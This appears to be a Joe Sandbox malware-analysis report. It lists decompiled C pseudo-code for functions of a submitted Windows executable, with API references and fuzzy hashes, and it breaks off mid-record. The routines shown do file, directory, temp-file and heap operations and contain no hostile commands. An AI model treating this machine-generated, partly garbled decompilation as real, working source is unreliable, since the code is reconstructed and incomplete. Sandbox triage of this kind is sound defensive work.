                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 30%
                                          			E00413F9F(intOrPtr _a4) {
                                          				signed int _v8;
                                          				char _v20;
                                          				intOrPtr _v32;
                                          				char _v36;
                                          				intOrPtr _v40;
                                          				char _v44;
                                          				char _t19;
                                          				intOrPtr _t20;
                                          				intOrPtr _t24;
                                          				intOrPtr _t27;
                                          				intOrPtr _t40;
                                          				char _t42;
                                          				intOrPtr _t49;
                                          
                                          				_push(0xffffffff);
                                          				_push(0x41b9a0);
                                          				_push(E00414A2C);
                                          				_t19 =  *[fs:0x0];
                                          				_push(_t19);
                                          				 *[fs:0x0] = _t42;
                                          				_t40 = _a4;
                                          				if(_t40 != 0) {
                                          					_t20 =  *0x425a38; // 0x1
                                          					if(_t20 != 3) {
                                          						if(_t20 != 2) {
                                          							_push(_t40);
                                          							goto L12;
                                          						} else {
                                          							E0041570A(9);
                                          							_v8 = 1;
                                          							_t24 = E004167F8(_t40,  &_v44,  &_v36);
                                          							_v40 = _t24;
                                          							if(_t24 != 0) {
                                          								E0041684F(_v44, _v36, _t24);
                                          							}
                                          							_v8 = _v8 | 0xffffffff;
                                          							_t19 = E00414061();
                                          							goto L9;
                                          						}
                                          					} else {
                                          						E0041570A(9);
                                          						_v8 = _v8 & 0x00000000;
                                          						_t27 = E00415A9D(_t40);
                                          						_v32 = _t27;
                                          						if(_t27 != 0) {
                                          							_push(_t40);
                                          							_push(_t27);
                                          							E00415AC8();
                                          						}
                                          						_v8 = _v8 | 0xffffffff;
                                          						_t19 = E00414009();
                                          						_t49 = _v32;
                                          						L9:
                                          						if(_t49 == 0) {
                                          							_push(_a4);
                                          							L12:
                                          							_push(0);
                                          							_t19 = RtlFreeHeap( *0x425a34); // executed
                                          						}
                                          					}
                                          				}
                                          				 *[fs:0x0] = _v20;
                                          				return _t19;
                                          			}

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,00000000,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074), ref: 00414073
                                            • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
                                            • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapInitialize
                                          • String ID:
                                          • API String ID: 641406236-0
                                          • Opcode ID: d24b5f948fba04bba88b9cd0cdc5eff1b7a8b89ab7c34ea04cbff2048bde7936
                                          • Instruction ID: 47133188c5d3e4a4a91398ef735a592283a7fe3b34e77d79aa204ad2d485eaa9
                                          • Opcode Fuzzy Hash: d24b5f948fba04bba88b9cd0cdc5eff1b7a8b89ab7c34ea04cbff2048bde7936
                                          • Instruction Fuzzy Hash: 8321C572901609EADB20ABA6DC46BDE7B78EF48764F14021BF511B61C0D77C89C18AAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E0040A011(signed int __ecx, void* __eflags) {
                                          				void* _t28;
                                          				intOrPtr* _t42;
                                          				intOrPtr* _t43;
                                          				void* _t49;
                                          
                                          				E00413954(E00419E67, _t49);
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				 *((intOrPtr*)(_t49 - 0x10)) = __ecx;
                                          				 *(_t49 - 4) = 4;
                                          				E004042AD(__ecx + 0xb4);
                                          				 *(_t49 - 4) = 3;
                                          				E004042AD(__ecx + 0xa0);
                                          				_t42 = __ecx + 0x8c;
                                          				 *((intOrPtr*)(_t49 - 0x14)) = _t42;
                                          				 *_t42 = 0x41b6c0;
                                          				 *(_t49 - 4) = 5;
                                          				E004042D6();
                                          				 *(_t49 - 4) = 2;
                                          				E004042AD(_t42);
                                          				_t43 = __ecx + 0x78;
                                          				 *((intOrPtr*)(_t49 - 0x14)) = _t43;
                                          				 *_t43 = 0x41b6c8;
                                          				 *(_t49 - 4) = 6;
                                          				E004042D6();
                                          				 *(_t49 - 4) = 1;
                                          				E004042AD(_t43);
                                          				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
                                          				E00407868(__ecx);
                                          				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
                                          				asm("sbb ecx, ecx");
                                          				_t28 = E00409C49( ~__ecx & __ecx + 0x00000014,  ~__ecx & __ecx + 0x00000014); // executed
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0xc));
                                          				return _t28;
                                          			}

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0040A016
                                            • Part of subcall function 00409C49: __EH_prolog.LIBCMT ref: 00409C4E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: a5db852efdc6b67417a23c65be594c4014babbfd4966d5bc1e1ef807a1e39f82
                                          • Instruction ID: 1dffea12e82b47f2a36155f0264cd4dada82ecc0bfe076f3ab6191fd12039e28
                                          • Opcode Fuzzy Hash: a5db852efdc6b67417a23c65be594c4014babbfd4966d5bc1e1ef807a1e39f82
                                          • Instruction Fuzzy Hash: 4C118FB0A01254DADB09EBAAC5153EDFBA69FA1318F14419FA542732D2CBF81B048666
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 81%
                                          			E004092E9(void* __ecx, void* __eflags) {
                                          				signed char _t22;
                                          				void* _t24;
                                          				void* _t45;
                                          				void* _t47;
                                          
                                          				E00413954(E00419BF8, _t47);
                                          				_t45 = __ecx;
                                          				_t41 = __ecx + 0x10;
                                          				E00401D7A(__ecx + 0x10,  *((intOrPtr*)(_t47 + 8)));
                                          				_push( *((intOrPtr*)(_t47 + 0xc)));
                                          				_push( *((intOrPtr*)(E00402634(_t47 - 0x18, _t41))));
                                          				 *(_t47 - 4) = 0;
                                          				_t22 = E00405841(__ecx + 0x20, _t41); // executed
                                          				asm("sbb bl, bl");
                                          				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
                                          				E00403A9C( *((intOrPtr*)(_t47 - 0x18)));
                                          				if( ~_t22 + 1 != 0) {
                                          					 *((intOrPtr*)(_t47 + 8)) = 1;
                                          					E00413D3D(_t47 + 8, 0x41c4c0);
                                          				}
                                          				_t24 = E004042D6();
                                          				 *(_t45 + 0x58) =  *(_t45 + 0x58) & 0x00000000;
                                          				 *((intOrPtr*)(_t45 + 0x88)) = 0;
                                          				 *((intOrPtr*)(_t45 + 0x8c)) = 0;
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
                                          				return _t24;
                                          			}

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 004092EE
                                            • Part of subcall function 00402634: __EH_prolog.LIBCMT ref: 00402639
                                            • Part of subcall function 00405841: __EH_prolog.LIBCMT ref: 00405846
                                            • Part of subcall function 00413D3D: RaiseException.KERNEL32(00000003,00000000,00000003,?,00000003,?,00000003,00000000,00000000,00401055,00000003,?,00000000), ref: 00413D6B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog$ExceptionRaise
                                          • String ID:
                                          • API String ID: 2062786585-0
                                          • Opcode ID: 0f97881bfda5a338648d471f12701516f54a75613031e54e105c5c79c14cffea
                                          • Instruction ID: f7fbb3e9a8787d76bf0f9f15101cef5fd9d7ebfa1ebb25f778e30044bb5e9d70
                                          • Opcode Fuzzy Hash: 0f97881bfda5a338648d471f12701516f54a75613031e54e105c5c79c14cffea
                                          • Instruction Fuzzy Hash: 7B01D6766406049ACB10EF25C451ADEBBB1FF95318F00852FE896632E1CB785649CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 64%
                                          			E00404D6C(void* __ecx) {
                                          				signed char _t18;
                                          				intOrPtr* _t24;
                                          				void* _t25;
                                          				void* _t27;
                                          				void* _t30;
                                          				void* _t41;
                                          
                                          				E00413954(E004195F0, _t41);
                                          				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                          				_t18 =  *(__ecx + 0x20) >> 4;
                                          				_t46 = _t18 & 0x00000001;
                                          				if((_t18 & 0x00000001) == 0) {
                                          					_t30 = __ecx + 0x28;
                                          					__eflags = _t30;
                                          					_push(_t30);
                                          					_t27 = E00404BDC( *((intOrPtr*)(E00405417(_t41 - 0x18, _t41 + 8))), __eflags);
                                          					_push( *((intOrPtr*)(_t41 - 0x18)));
                                          				} else {
                                          					_push(__ecx + 0x28);
                                          					_t24 = E00405417(_t41 - 0x18, _t41 + 8);
                                          					 *(_t41 - 4) = 1;
                                          					_t25 = E00404C4A(_t24, _t46); // executed
                                          					_t27 = _t25;
                                          					_push( *((intOrPtr*)(_t41 - 0x18)));
                                          				}
                                          				E00403A9C();
                                          				E00403A9C( *((intOrPtr*)(_t41 + 8)));
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
                                          				return _t27;
                                          			}










                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00404D71
                                            • Part of subcall function 00405417: __EH_prolog.LIBCMT ref: 0040541C
                                            • Part of subcall function 00404C4A: __EH_prolog.LIBCMT ref: 00404C4F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 0829d6d4e2349ba8d3de6fc09fd6bc5a7f7a281632d8264b3d1e6490f9b222f7
                                          • Instruction ID: f66e6ca9409e8e8da17af4a7d05db337a423f76100d3163e29410ef6f876c1fe
                                          • Opcode Fuzzy Hash: 0829d6d4e2349ba8d3de6fc09fd6bc5a7f7a281632d8264b3d1e6490f9b222f7
                                          • Instruction Fuzzy Hash: 4901A2B25101049ACB09EF90C852BED7B70EF94308F00412FE505776D2DB395A99CA48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004027A6(void* __ecx) {
                                          				void* _t17;
                                          				signed int _t31;
                                          				intOrPtr _t34;
                                          				void* _t36;
                                          
                                          				E00413954(E0041919C, _t36);
                                          				E00401CE1(_t36 - 0x18, __ecx + 0x10);
                                          				_t34 =  *((intOrPtr*)(_t36 + 8));
                                          				_t31 = 0;
                                          				 *((intOrPtr*)(_t36 - 4)) = 0;
                                          				if( *((intOrPtr*)(_t34 + 8)) > 0) {
                                          					do {
                                          						E00401DE3(_t36 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t34 + 0xc)) + _t31 * 4)));
                                          						E0040499C( *((intOrPtr*)(_t36 - 0x18))); // executed
                                          						E00401DB8(_t36 - 0x18, 0x5c);
                                          						_t31 = _t31 + 1;
                                          					} while (_t31 <  *((intOrPtr*)(_t34 + 8)));
                                          				}
                                          				_t17 = E00403A9C( *((intOrPtr*)(_t36 - 0x18)));
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
                                          				return _t17;
                                          			}








                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 01677122db5f9a9dc92e0e68fc714b810c240e95920f6c7928f993aadc845804
                                          • Instruction ID: 116dfd3529ede02fc162d870fedee277598c738aed7d6567ac0ffa60a71ea666
                                          • Opcode Fuzzy Hash: 01677122db5f9a9dc92e0e68fc714b810c240e95920f6c7928f993aadc845804
                                          • Instruction Fuzzy Hash: BCF04F719005069BDB15EB9AC892AEFBBB5FF80308F00403FE142775E2CA787985DB84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004048B7(WCHAR* __ecx, long __edx) {
                                          				char _v16;
                                          				void* __ebp;
                                          				signed int _t5;
                                          				void* _t9;
                                          
                                          				if( *0x423148 != 0) {
                                          					_t5 = SetFileAttributesW(__ecx, __edx); // executed
                                          					return _t5 & 0xffffff00 | _t5 != 0x00000000;
                                          				}
                                          				_t9 = E0040489C( *((intOrPtr*)(E004048FF( &_v16, __ecx))), __edx);
                                          				E00403A9C(_v16);
                                          				return _t9;
                                          			}








                                          APIs
                                          • SetFileAttributesW.KERNELBASE ref: 004048F1
                                            • Part of subcall function 004048FF: __EH_prolog.LIBCMT ref: 00404904
                                            • Part of subcall function 004048FF: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00404920
                                            • Part of subcall function 0040489C: SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: File$Attributes$ApisH_prolog
                                          • String ID:
                                          • API String ID: 3885834519-0
                                          • Opcode ID: 5b715810b1dd674a34631cbecd8c08cc0b37525bd29b6e223b4e60d05e4c896b
                                          • Instruction ID: d8abee0b5bf8aaacd3c7805e8248c04f8c14d25ec22198af343fb12e16f398c4
                                          • Opcode Fuzzy Hash: 5b715810b1dd674a34631cbecd8c08cc0b37525bd29b6e223b4e60d05e4c896b
                                          • Instruction Fuzzy Hash: 76E02B66F002502BC7103BA5AC065DB3B9D9B81314B20C43BA602A3291E9388E44A258
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040499C(WCHAR* __ecx) {
                                          				char _v16;
                                          				void* __ebp;
                                          				signed int _t5;
                                          				void* _t8;
                                          
                                          				if( *0x423148 != 0) {
                                          					_t5 = CreateDirectoryW(__ecx, 0); // executed
                                          					return _t5 & 0xffffff00 | _t5 != 0x00000000;
                                          				} else {
                                          					_t8 = E0040498D( *((intOrPtr*)(E004048FF( &_v16, __ecx))));
                                          					E00403A9C(_v16);
                                          					return _t8;
                                          				}
                                          			}








                                          APIs
                                          • CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000), ref: 004049D0
                                            • Part of subcall function 004048FF: __EH_prolog.LIBCMT ref: 00404904
                                            • Part of subcall function 004048FF: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00404920
                                            • Part of subcall function 0040498D: CreateDirectoryA.KERNELBASE(?,00000000,00405228,?,?,?,?,00000003,?,00000000,?,00000000), ref: 00404990
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CreateDirectory$ApisFileH_prolog
                                          • String ID:
                                          • API String ID: 1021588753-0
                                          • Opcode ID: 64b02790250bc5f7a2d9c9dee2bb0ba3baf7154ac0717740dd27b10109941aca
                                          • Instruction ID: 2f64d7a75cdf7ff6db5ed191fdbb19fa086d8aebc57dacf92a4c812467fb8a6f
                                          • Opcode Fuzzy Hash: 64b02790250bc5f7a2d9c9dee2bb0ba3baf7154ac0717740dd27b10109941aca
                                          • Instruction Fuzzy Hash: 18E0DFA0B002002BCB147B79AC0679E376D4B80218F10867EA652671E1EA7999449608
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004050AB(CHAR* __ecx, CHAR* __edx, CHAR** _a4) {
                                          				int _t4;
                                          				CHAR* _t8;
                                          				CHAR* _t13;
                                          				CHAR** _t15;
                                          
                                          				_t15 = _a4;
                                          				_t13 = __edx;
                                          				_t8 = __ecx;
                                          				if(_t15[2] <= 0x105) {
                                          					E0040243E(_t15, 0x105);
                                          				}
                                          				_t4 = GetTempFileNameA(_t8, _t13, 0,  *_t15); // executed
                                          				E00404296(_t15);
                                          				return _t4;
                                          			}








                                          APIs
                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,00000003,?,?,00000000,004050FF,?,?,?,00405160,?,?,?,00000003), ref: 004050CE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FileNameTemp
                                          • String ID:
                                          • API String ID: 745986568-0
                                          • Opcode ID: b528cc7740eeb1b4bc26185d4807bc948aa73c1e47f21f7391ebf62f515a6cd3
                                          • Instruction ID: d5c13e583cf4c34c7a3a11816bb62f42e40da82da4d3cfe63a6d47b8b5213b5b
                                          • Opcode Fuzzy Hash: b528cc7740eeb1b4bc26185d4807bc948aa73c1e47f21f7391ebf62f515a6cd3
                                          • Instruction Fuzzy Hash: 91E086723016106BD71056699C45A4BA7DEDFD8752F15843FB545E3381D6B48C004A78
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 84%
                                          			E004058CD(void* __ecx, void* __edx, void* __eflags) {
                                          				void* _t10;
                                          				void* _t25;
                                          
                                          				E00413954(E00419718, _t25);
                                          				E00404D51(_t25 - 0x44);
                                          				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                          				_push(__ecx);
                                          				_t10 = E00405806(_t25 - 0x44, __edx); // executed
                                          				E00403A9C( *((intOrPtr*)(_t25 - 0x1c)));
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t25 - 0xc));
                                          				return _t10;
                                          			}






                                          APIs
                                          • __EH_prolog.LIBCMT ref: 004058D2
                                            • Part of subcall function 00405806: __EH_prolog.LIBCMT ref: 0040580B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 4dbd7d17023fb4ed967e01381c8a8867ec9f7b58b557c0ee91cef2e13e81d9e3
                                          • Instruction ID: 5bfd618a99589873673dbdde5608ad138896477ef474a485a6b18cf586c7d2b5
                                          • Opcode Fuzzy Hash: 4dbd7d17023fb4ed967e01381c8a8867ec9f7b58b557c0ee91cef2e13e81d9e3
                                          • Instruction Fuzzy Hash: E7E01A72D410049ACB05BB95E9526EDB778EF51319F10403BA412725919B785E18CA58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E00405C87(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
                                          				long _v8;
                                          				long _t12;
                                          				signed int _t14;
                                          				void** _t16;
                                          
                                          				_t16 = __ecx;
                                          				_push(__ecx);
                                          				_t12 =  *0x42045c; // 0x400000
                                          				if(_a8 > _t12) {
                                          					_a8 = _t12;
                                          				}
                                          				_v8 = _v8 & 0x00000000;
                                          				_t14 = WriteFile( *_t16, _a4, _a8,  &_v8, 0); // executed
                                          				 *_a12 = _v8;
                                          				return _t14 & 0xffffff00 | _t14 != 0x00000000;
                                          			}








                                          APIs
                                          • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00405CAA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: e8bb3e3f97a2863afff16af0127552a93838812ee23e56086e0288621279a6ee
                                          • Instruction ID: 646c0e8b7f70081892c45aa98fa77e415187d9694f298a279afc83584de54578
                                          • Opcode Fuzzy Hash: e8bb3e3f97a2863afff16af0127552a93838812ee23e56086e0288621279a6ee
                                          • Instruction Fuzzy Hash: F8E0E575600208FFCB11CF95C801B8E7BF9EB09364F20C069F914AA260D339EA50DF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004057CF(void** __ecx, intOrPtr _a4) {
                                          				struct _WIN32_FIND_DATAA _v324;
                                          				int _t7;
                                          				signed int _t10;
                                          				signed int _t11;
                                          
                                          				_t7 = FindNextFileA( *__ecx,  &_v324); // executed
                                          				_t11 = _t10 & 0xffffff00 | _t7 != 0x00000000;
                                          				_t16 = _t11;
                                          				if(_t11 != 0) {
                                          					E0040557F( &_v324, _a4, _t16);
                                          				}
                                          				return _t11;
                                          			}








                                          APIs
                                          • FindNextFileA.KERNELBASE(000000FF,?,00000000), ref: 004057E2
                                          Similarity
                                          • API ID: FileFindNext
                                          • String ID:
                                          • API String ID: 2029273394-0
                                          • Opcode ID: 3f971b6e9297c3c0785ec7bffefe866e244883e864d52b31c5d14701259a415c
                                          • Instruction ID: a758ab2b17ce6f49d488120cb08fd5c978c50398f8c9baf96463bb2a7ddcf629
                                          • Opcode Fuzzy Hash: 3f971b6e9297c3c0785ec7bffefe866e244883e864d52b31c5d14701259a415c
                                          • Instruction Fuzzy Hash: 7CD0C231140009ABC711EB21DC41EEA33ADEB04348F144075AA495B1B0EA319D489F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E00405841(void* __ecx, void* __edx) {
                                          				void* _t11;
                                          				void* _t22;
                                          
                                          				E00413954(E004196F0, _t22);
                                          				_push(__ecx);
                                          				 *(_t22 - 0x10) =  *(_t22 - 0x10) | 0xffffffff;
                                          				_t3 = _t22 - 4;
                                          				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
                                          				_t11 = E004055DE(_t22 - 0x10,  *_t3,  *((intOrPtr*)(_t22 + 8)), __ecx); // executed
                                          				E0040551A(_t22 - 0x10);
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t22 - 0xc));
                                          				return _t11;
                                          			}






                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00405846
                                            • Part of subcall function 004055DE: __EH_prolog.LIBCMT ref: 004055E3
                                            • Part of subcall function 004055DE: FindFirstFileW.KERNELBASE(?,?), ref: 00405611
                                            • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                                          Similarity
                                          • API ID: FindH_prolog$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2004497850-0
                                          • Opcode ID: 220b4cbfc40620496b03372d3826f196b8ab05123004ed9f75f8387d5271fe3c
                                          • Instruction ID: b7fde63f1f0c292b4e5d00ec8c3d5d27a79480d2707f186765d0e2b5b752fd38
                                          • Opcode Fuzzy Hash: 220b4cbfc40620496b03372d3826f196b8ab05123004ed9f75f8387d5271fe3c
                                          • Instruction Fuzzy Hash: 7CE04FB1951506ABCB14DF50CC52AEEB734FB1131CF10421EE021722D08B785648CA28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E00405806(void* __ecx, void* __edx) {
                                          				void* _t11;
                                          				void* _t22;
                                          
                                          				E00413954(E004196DC, _t22);
                                          				_push(__ecx);
                                          				 *(_t22 - 0x10) =  *(_t22 - 0x10) | 0xffffffff;
                                          				_t3 = _t22 - 4;
                                          				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
                                          				_t11 = E0040553A(_t22 - 0x10,  *_t3,  *((intOrPtr*)(_t22 + 8)), __ecx); // executed
                                          				E0040551A(_t22 - 0x10);
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t22 - 0xc));
                                          				return _t11;
                                          			}






                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0040580B
                                            • Part of subcall function 0040553A: FindFirstFileA.KERNELBASE(?,?,000000FF), ref: 00405559
                                            • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                                          Similarity
                                          • API ID: Find$CloseFileFirstH_prolog
                                          • String ID:
                                          • API String ID: 889498515-0
                                          • Opcode ID: bc6002362a3e3570d7b7dbbff413248cb0e6e96336b5f812f3c621cb83c14948
                                          • Instruction ID: 15a52a3ac40e1f9f01e416ae3406c700f8aec04b6379e90cb97043f6baa550c5
                                          • Opcode Fuzzy Hash: bc6002362a3e3570d7b7dbbff413248cb0e6e96336b5f812f3c621cb83c14948
                                          • Instruction Fuzzy Hash: 2AE01AB195150AAACB04DB50CC52AEEB760EB1131CF00421AA421722D0877856488A28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E0040F8C3(intOrPtr* __ecx, void* __eflags) {
                                          				void* _t8;
                                          				void* _t17;
                                          				intOrPtr _t19;
                                          
                                          				E00413954(E0041A808, _t17);
                                          				_push(__ecx);
                                          				 *(_t17 - 4) =  *(_t17 - 4) & 0x00000000;
                                          				 *((intOrPtr*)(_t17 - 0x10)) = _t19;
                                          				_t8 = E0040F648(__ecx, __eflags,  *((intOrPtr*)(_t17 + 8))); // executed
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t17 - 0xc));
                                          				return _t8;
                                          			}







                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0040F8C8
                                            • Part of subcall function 0040F648: __EH_prolog.LIBCMT ref: 0040F64D
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: fd9f4e5796ff426001010c6032b0bd2709108ec26b7ef45d9eef3846ac2bdd07
                                          • Instruction ID: 6b40bdca6a02cd8c303c1b1c800ac92429027f894e9b325ac65d5e69f4ab0667
                                          • Opcode Fuzzy Hash: fd9f4e5796ff426001010c6032b0bd2709108ec26b7ef45d9eef3846ac2bdd07
                                          • Instruction Fuzzy Hash: 0CD01272911104EBD711AB49D842BDEBB68EB8135DF10853BF00171550C37D56459569
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E00405B7B(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
                                          				long _v8;
                                          				signed int _t11;
                                          
                                          				_push(__ecx);
                                          				_v8 = _v8 & 0x00000000;
                                          				_t11 = ReadFile( *__ecx, _a4, _a8,  &_v8, 0); // executed
                                          				 *_a12 = _v8;
                                          				return _t11 & 0xffffff00 | _t11 != 0x00000000;
                                          			}






                                          APIs
                                          • ReadFile.KERNELBASE(000000FF,00000000,?,?,00000000,000000FF,?,00405BC6,00000000,?,00000000,?,00405BEC,00000000,?,00000000), ref: 00405B91
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: a0fa365660526cfbb9cae47ffd537a5a3e67cffdb1018a760807b9850e2f108c
                                          • Instruction ID: c5e24743f6b433bb21cc94cc2971fe47eb8403274bd7f90fdb54931116458873
                                          • Opcode Fuzzy Hash: a0fa365660526cfbb9cae47ffd537a5a3e67cffdb1018a760807b9850e2f108c
